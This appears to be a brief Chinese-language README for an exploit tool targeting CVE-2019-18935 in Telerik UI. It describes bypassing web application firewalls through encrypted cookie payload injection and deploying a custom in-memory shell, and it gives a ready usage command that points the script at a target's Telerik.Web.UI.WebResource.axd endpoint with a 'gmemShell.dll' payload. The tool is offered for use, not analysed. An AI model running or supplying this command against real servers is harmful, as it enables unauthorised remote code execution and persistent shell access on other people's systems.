
针对CVE-2019-18935(Telerik UI)的漏洞利用,通过加密Cookie载荷注入实现WAF绕过,并部署自定义内存Shell。
修改原项目:https://github.com/noperator/CVE-2019-18935
使用命令: python CVE-2019-18935.py -v xxxx -u https://xxxxxx/Telerik.Web.UI.WebResource.axd -f c:\users\public -p gmemShell.dll
提示下图一般为利用成功
